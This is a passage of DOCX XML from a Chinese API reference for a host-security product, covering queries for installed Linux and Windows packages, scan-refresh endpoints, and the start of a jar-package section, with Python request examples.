            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B8B1F0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233314F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B7CFBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA9BCF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38C85A77" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D595C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56DF99BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B197BBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAD0C93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C44F449" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794352D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26CD99C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389176C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F86AA6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装类型（仅Linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32121207" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C5C6271" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F3985A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC95A91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A45307" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B8CEED2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4A7241" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="150E0E0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573D7B29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CAAB274" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>总述(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5C5B30E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B2D0AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFC1CFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F11331" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637A0D40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件发布者(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FA698C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31701A43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34AC37FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DEC8880" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="063D7B0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装路径(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24E9C693" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3540228C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>productVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787A324B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E8547F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FE3952" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装版本(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E00C7B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3773C055" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pkgSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA648EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C48BA4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D205F9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件大小(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EFA0AAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097850DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def pkg_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/pkg/linux?name=bash-completion&amp;version=1:2.1-4.2ubuntu1&amp;installTime=2018-06-27%%2000:00:00%%20-%%202018-06-29%%2000:00:00&amp;type=dpkg" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'bash-completion', 'version': '1:2.1-4.2ubuntu1', 'installTime': '2018-06-27 00:00:00 - 2018-06-29 00:00:00', 'type': 'dpkg'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2E2CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8405B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>win安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB9072" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def pkg_win():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/pkg/win?name=Google%%20Chrome%%20Canary&amp;publisher=Google%%20Inc.&amp;installTime=2018-05-29%%2000:00:00%%20-%%202018-06-01%%2000:00:00&amp;size=1&amp;productVersion=69.0.3444.1&amp;path=C:%%5cUsers%%5cadmin.ZHONGYANGLI%%5cAppData%%5cLocal%%5cGoogle%%5cChrome%%20SxS%%5cApplication" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'Google Chrome Canary', 'publisher': 'Google Inc.', 'installTime': '2018-05-29 00:00:00 - 2018-06-01 00:00:00', 'size': 1, 'productVersion': '69.0.3444.1','path': 'C:\Users\\admin.QINGTENG\AppData\Local\Google\Chrome SxS\Application'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03415F40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFDB36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="安装包信息扫描"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r>
        <w:t>安装包信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B992F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求安装包信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47F14F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42014CF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/pkg/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2CE3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDED592" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB432F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213B0A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/pkg/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086CD3BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52037756" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06063E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A56DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675303B2"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36118C7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6C1B255" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE34B94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD771C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D342F90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A3CA0FC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A46934F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608E34FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A9387FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18D47942" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72F8AC60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux安装包信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9CDFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/pkg/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32607180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
      <w:r>
        <w:t>win安装包信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF0861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/pkg/win/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452132A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="安装包信息查询扫描状态"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:t>安装包信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0FA1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询安装包信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA76B39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="jar包信息"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:t>jar包信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C930E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516563BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的jar包信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AFF305" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AEAD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>jar包信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E04D1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
